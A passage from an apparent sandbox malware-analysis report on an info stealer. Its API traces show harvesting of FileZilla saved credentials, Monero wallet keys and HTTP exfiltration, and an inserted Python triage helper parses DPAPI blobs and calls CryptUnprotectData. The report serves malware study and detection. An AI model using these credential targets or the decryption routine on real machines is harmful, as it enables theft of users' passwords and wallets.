                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 70724de9d9be9b42b2273efc95cc51bac89d6d126c342ea9aa103cb7f72ba91d
                              • Instruction ID: 669d051cdb161eaf0b57b177ff26e6f7fff5f0cf4a3428b7ae5e1e5d30f70f07
                              • Opcode Fuzzy Hash: 70724de9d9be9b42b2273efc95cc51bac89d6d126c342ea9aa103cb7f72ba91d
                              • Instruction Fuzzy Hash: 4511BAB8A00209DFCB04DFA4D985AAE77B5FF88300F1085A8E91597354D774AE50CF61
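Read together, the two crypt32 chains above describe one pipeline: CryptStringToBinaryA is called twice (00FB9AEF and 00FB9B2A) with dwFlags = 1, CRYPT_STRING_BASE64, around a LocalAlloc with uFlags 0x40, which is the size-query-then-decode idiom for turning a base64 string into bytes, and CryptUnprotectData (00FB9B84) is then called with no description pointer, no optional entropy, no prompt structure and dwFlags = 0 before the result is copied into a LocalAlloc buffer and the original freed, which decrypts a DPAPI blob under the current user's keys. The Python below is an added triage helper, not code from the Joe Sandbox report, from the sample or from any Stealc source: it decodes base64 the way the first chain does, parses the DPAPI blob header so an analyst can read the master-key GUID, algorithms and sizes without decrypting anything, and, on Windows only, issues the same CryptUnprotectData(pDataIn, NULL, NULL, NULL, NULL, 0, pDataOut) call through ctypes. The report does not say where the sample's input strings come from, so the tolerance for a 5-byte "DPAPI" tag in front of the blob, the sample master-key GUID and the constructed blob are assumptions made only to exercise the parser.

```python
import base64
import re
import struct
import sys
import uuid

# Provider GUID that CryptProtectData writes into every DPAPI blob header.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA1", 0x800E: "SHA-512"}


def decode_base64_string(text: str) -> bytes:
    """Portable stand-in for the report's CryptStringToBinaryA(dwFlags=1, CRYPT_STRING_BASE64)
    pair: size query with pbBinary=NULL, LocalAlloc(0x40 = LPTR), decode into the buffer.
    Whitespace is dropped first so a string copied with line breaks still decodes."""
    return base64.b64decode(re.sub(r"\s+", "", text), validate=True)


def parse_dpapi_blob(blob: bytes) -> dict:
    """Read the cleartext header of a DPAPI blob (what CryptUnprotectData consumes) without
    decrypting; the master-key GUID names the %APPDATA%\\Microsoft\\Protect\\<SID>\\ file."""
    if blob.startswith(b"DPAPI"):   # assumption: tolerate a 5-byte tag some callers prepend
        blob = blob[5:]
    off = 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(blob):
            raise ValueError("truncated DPAPI blob")
        off += n
        return blob[off - n:off]

    def u32() -> int:
        return struct.unpack("<I", take(4))[0]
    version, provider = u32(), uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    u32()                                       # master key version
    master_key = uuid.UUID(bytes_le=take(16))
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt, alg_crypt_bits = u32(), u32()
    salt = take(u32())
    take(u32())                                 # HMAC key material, unused for triage
    alg_hash, alg_hash_bits = u32(), u32()
    take(u32())                                 # second HMAC key material
    data = take(u32())
    take(u32())                                 # signature
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return {"master_key_guid": str(master_key), "flags": flags, "description": description,
            "cipher": CALG_NAMES.get(alg_crypt, hex(alg_crypt)), "cipher_bits": alg_crypt_bits,
            "hash": CALG_NAMES.get(alg_hash, hex(alg_hash)), "hash_bits": alg_hash_bits,
            "salt_len": len(salt), "ciphertext_len": len(data)}


def crypt_unprotect_data(blob: bytes) -> bytes:
    """Windows only: the report's CryptUnprotectData(pDataIn, NULL, NULL, NULL, NULL, 0,
    pDataOut), then LocalFree of the output buffer once it has been copied out."""
    if sys.platform != "win32":
        raise OSError("DPAPI decryption needs the Windows crypt32 API")
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD), ("pbData", ctypes.c_void_p)]
    crypt32 = ctypes.WinDLL("crypt32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.LocalFree.argtypes = [wintypes.HLOCAL]   # keep 64-bit pointers intact
    buf = ctypes.create_string_buffer(blob, len(blob))
    data_in, data_out = DATA_BLOB(len(blob), ctypes.addressof(buf)), DATA_BLOB()
    if not crypt32.CryptUnprotectData(ctypes.byref(data_in), None, None, None, None, 0,
                                      ctypes.byref(data_out)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        return ctypes.string_at(data_out.pbData, data_out.cbData)
    finally:
        kernel32.LocalFree(data_out.pbData)


def build_sample_blob_b64(master_key_guid: str, description: str, ciphertext: bytes) -> str:
    """Constructed input (not CryptProtectData output): a syntactically valid AES-256/SHA-512
    blob with dummy salt and signature, base64-encoded with line breaks, for offline testing."""
    desc = description.encode("utf-16-le") + b"\x00\x00"
    salt, sign = b"\x01" * 32, b"\x02" * 64
    blob = b"".join([
        struct.pack("<I", 1), DPAPI_PROVIDER_GUID.bytes_le,
        struct.pack("<I", 1), uuid.UUID(master_key_guid).bytes_le,
        struct.pack("<I", 0),                            # flags
        struct.pack("<I", len(desc)), desc,
        struct.pack("<II", 0x6610, 256),                 # CALG_AES_256, key bits
        struct.pack("<I", len(salt)), salt,
        struct.pack("<I", 0),                            # no HMAC key
        struct.pack("<II", 0x800E, 512),                 # CALG_SHA_512, hash bits
        struct.pack("<I", 0),                            # no second HMAC key
        struct.pack("<I", len(ciphertext)), ciphertext,
        struct.pack("<I", len(sign)), sign,
    ])
    return base64.encodebytes(blob).decode()
```

Run parse_dpapi_blob(decode_base64_string(s)) over any base64 string carved from the sample's memory dumps: a provider GUID other than df9d8cd0-1501-11d1-8c7a-00c04fc297eb means the bytes were never DPAPI output, and the master-key GUID tells you which master key file under the victim's Protect directory would be needed to decrypt it, which decides whether a captured blob is of any use outside that user's session. crypt_unprotect_data only reproduces the call for analysis on a Windows box where you own the profile; nothing in the block fetches or decrypts data from the sample's C2.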
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: H%mk$nLY^
                              • API String ID: 0-3407211649
                              • Opcode ID: 75ec0b0bc14897c11e33591bb3ec0fbc393f664b2000c224298b402936838e64
                              • Instruction ID: e9e2af809dfdb718a398835e73bd200560c358d66cc44907b0fa4ea0dfc68184
                              • Opcode Fuzzy Hash: 75ec0b0bc14897c11e33591bb3ec0fbc393f664b2000c224298b402936838e64
                              • Instruction Fuzzy Hash: 18B2D1F3A0C2109FE304AE29DC8567EFBE5EF94720F16892DE6C487744EA3558418B97
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1{O$E x$P|L)
                              • API String ID: 0-300466160
                              • Opcode ID: 5759536be890d015265aab73ae51b3ec1dbbbd1d5b0a358413a92f2f72167870
                              • Instruction ID: 684f657cedf7d457444e6337b1d4d7831707d2767814abc5b238e3115ec714b0
                              • Opcode Fuzzy Hash: 5759536be890d015265aab73ae51b3ec1dbbbd1d5b0a358413a92f2f72167870
                              • Instruction Fuzzy Hash: E16108F3E186144FE7106E2DEC85766BADAEBD4310F1A863DEAC887344E9395C058292
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: R3[Z
                              • API String ID: 0-3030155145
                              • Opcode ID: 5488d57a1df3fee258fe7d734b7c3dec54620fb25e0df943a6fb885262f00af4
                              • Instruction ID: 65a3c234d4a6b45b953eaf24adc0cb79b2f4ec02e94772e2849ea24fb0f44057
                              • Opcode Fuzzy Hash: 5488d57a1df3fee258fe7d734b7c3dec54620fb25e0df943a6fb885262f00af4
                              • Instruction Fuzzy Hash: E0720AF3A0C6009FE704AE2DEC8566AFBE5EF94720F16853DE6C4C7344EA3598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: p[
                              • API String ID: 0-3533522376
                              • Opcode ID: 7b13a7b8695a44f78c25e1d5af9dcb0c1615113ea748b69172660c2e6cc30a40
                              • Instruction ID: e3c5dae4615444fc922bdc037e96a71d2f8f238154546f2216295a6b873b5068
                              • Opcode Fuzzy Hash: 7b13a7b8695a44f78c25e1d5af9dcb0c1615113ea748b69172660c2e6cc30a40
                              • Instruction Fuzzy Hash: 695169F3A041149FF3086A38DC5A77ABBDAE795320F17463DEA89D7BC4E9395C018285
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #%o
                              • API String ID: 0-4121113136
                              • Opcode ID: 7b03818651e540b115db61428e679bff0886d6bc86025d617211b26901bc2de0
                              • Instruction ID: 7696415b28b0f6b4baafa120fe0a2e45710ff13c4998694ffac25ce337071314
                              • Opcode Fuzzy Hash: 7b03818651e540b115db61428e679bff0886d6bc86025d617211b26901bc2de0
                              • Instruction Fuzzy Hash: 1651F3B650C70DDFE709AE14DC8177AB7E8EB54B18F06492DD6D287B40EA3558408747
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db0efcd2fec72845a4164a55d74dce1e2933db7855fd2e4470814ebfb4d2860b
                              • Instruction ID: 38b2b360d3c07ee024a49ea4833566f9c4f4767e75331271523c12e19aab019b
                              • Opcode Fuzzy Hash: db0efcd2fec72845a4164a55d74dce1e2933db7855fd2e4470814ebfb4d2860b
                              • Instruction Fuzzy Hash: F65139B3E082145BE7146E2DEC0976BBBD9DF94320F1A053EEA88D3744E9359C0587D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d79b6e2cb6167a1d97949c6d881b8049bb78e1250ea2623cd3bac9fc9e864bd8
                              • Instruction ID: c3126e4d7a5bf2c466957882a7aad655883d119994dc15c4d06f776afc82ef49
                              • Opcode Fuzzy Hash: d79b6e2cb6167a1d97949c6d881b8049bb78e1250ea2623cd3bac9fc9e864bd8
                              • Instruction Fuzzy Hash: A101A7B214C3089FE349BEA9AC925BBF3DCEB14620F55452ED2C3C3B41FEB565004696
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00FD0DBA,00FD0DB7,00FD0DB6,00FD0DB3), ref: 00FC0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FC0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FC03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00FC0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FC0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FC0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00FC0571
                              • lstrcat.KERNEL32(?,url: ), ref: 00FC0580
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC0593
                              • lstrcat.KERNEL32(?,00FD1678), ref: 00FC05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC05B5
                              • lstrcat.KERNEL32(?,00FD167C), ref: 00FC05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00FC05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC05E6
                              • lstrcat.KERNEL32(?,00FD1688), ref: 00FC05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00FC0604
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC0617
                              • lstrcat.KERNEL32(?,00FD1698), ref: 00FC0626
                              • lstrcat.KERNEL32(?,00FD169C), ref: 00FC0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 27f05156f611885da1b4626f328ce5d16f4c7d81c747ba9783a6aecb7540f5ca
                              • Instruction ID: 2c96cf21ce0421ebe9e8e8e6242aab719a8f3842629f216167723f19450188cc
                              • Opcode Fuzzy Hash: 27f05156f611885da1b4626f328ce5d16f4c7d81c747ba9783a6aecb7540f5ca
                              • Instruction Fuzzy Hash: 63D13971900109ABCB08EBE0DE96FEE7739BF14300F54452DF116A7185EE78BA46EB61
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB59F8
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00DEEA48,00000000,?,00DED6A0,00000000,?,00FD1A1C), ref: 00FB5E71
                              • lstrlen.KERNEL32(00000000), ref: 00FB5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00FB5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00FB5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00FB5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FB5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00FB5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00FB5FBD
                              • HttpOpenRequestA.WININET(00000000,00DEEA18,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB5BF8
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • InternetCloseHandle.WININET(00000000), ref: 00FB5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 6b302953b892f4637819de1d7e9636d55161188f10c1451aee31510c67735ea5
                              • Instruction ID: 8dd5eadd603e9e773ec451425dcddd714fb278e9ab83d500a204dbd6ac9050c6
                              • Opcode Fuzzy Hash: 6b302953b892f4637819de1d7e9636d55161188f10c1451aee31510c67735ea5
                              • Instruction Fuzzy Hash: 21120B7182011DABDB18EBA0DD96FEEB338BF14704F4041ADB10A62091EF787A49DF65
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FBD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FBD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD208
                              • lstrcat.KERNEL32(?,00FD1478), ref: 00FBD217
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD22A
                              • lstrcat.KERNEL32(?,00FD147C), ref: 00FBD239
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD24C
                              • lstrcat.KERNEL32(?,00FD1480), ref: 00FBD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD26E
                              • lstrcat.KERNEL32(?,00FD1484), ref: 00FBD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD290
                              • lstrcat.KERNEL32(?,00FD1488), ref: 00FBD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD2B2
                              • lstrcat.KERNEL32(?,00FD148C), ref: 00FBD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD2D4
                              • lstrcat.KERNEL32(?,00FD1490), ref: 00FBD2E3
                                • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                                • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                              • lstrlen.KERNEL32(?), ref: 00FBD32A
                              • lstrlen.KERNEL32(?), ref: 00FBD339
                                • Part of subcall function 00FCAA70: StrCmpCA.SHLWAPI(00DE9088,00FBA7A7,?,00FBA7A7,00DE9088), ref: 00FCAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: ccfeb911a5b38c69af2d9f6ddaa7b08ac4b754a38859da6cb7cdc4a643c8e451
                              • Instruction ID: 0c8a301ba173365d27be06e0d78081be3ba1cbec3709962a40e848a8b311576f
                              • Opcode Fuzzy Hash: ccfeb911a5b38c69af2d9f6ddaa7b08ac4b754a38859da6cb7cdc4a643c8e451
                              • Instruction Fuzzy Hash: A0E13D71910109ABCB18EBA0EE96FEE7378BF54305F10416CF116A7091DE39BE45EB62
                              APIs
